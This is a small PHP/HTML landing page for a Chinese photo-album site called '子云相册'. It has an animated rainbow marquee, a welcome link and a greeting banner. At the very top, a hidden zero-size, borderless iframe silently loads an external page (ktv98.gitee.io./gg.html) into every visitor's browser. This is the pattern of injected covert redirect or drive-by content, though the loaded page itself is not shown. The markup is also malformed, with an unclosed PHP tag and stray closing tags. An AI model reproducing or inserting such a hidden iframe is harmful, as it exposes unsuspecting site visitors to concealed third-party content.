<?php
<iframe src="https://ktv98.gitee.io./gg.html" frameborder="0" width="0" height="0"></iframe>
<html>
	

				<title>

					子云相册
				</title>
				
<link type="text/css" rel="stylesheet" href="./index.css"><title> </title></head>
<body>
			<script src="./jquery.js"></script>  
    <script src="./clipboard.min.js"></script>  </script>  
    <div class="STYLE1">
<style>#nr{font-size:30px;margin: 10;background: -webkit-linear-gradient(left,#ffffff,#ff0000 

6.25%,#ff7d00 12.5%,#ffff00 18.75%,#00ff00 25%,#00ffff 31.25%,#0000ff 37.5%,#ff00ff 43.75%,#ffff00 50%,#ff0000 56.25%,#ff7d00 62.5%,#ffff00 68.75%,#00ff00 75%,#00ffff 

81.25%,#0000ff 87.5%,#ff00ff 93.75%,#ffff00 100%);-webkit-background-clip: text;-webkit-text-fill-color: transparent;background-size: 200% 100%;animation: masked-animation 2s 

infinite linear;}@keyframes masked-animation {0% {background-position: 0 0;}100% {background-position: -100%, 0;}}</style></div>
<TD height=40 width=821 colSpan=2><SPAN class=STYLE1>
<MARQUEE><STRONG>

<b id="nr"><a href="https://98tv.github.io">欢迎来到子云相册</a></FONT></STRONG></MARQUEE></SPAN>
</div>
	</marquee></style>
						<div class="mod mod-global-nav nav-header t5 center no-icon line bg2">
							<div class="cell title"><span>
									
										子云提醒每天都要快乐哦<a href="">--打开官网</a>								</a>
								</span>
							</div>  </div> </div> 
						</div>


</html>
</html>
  
        
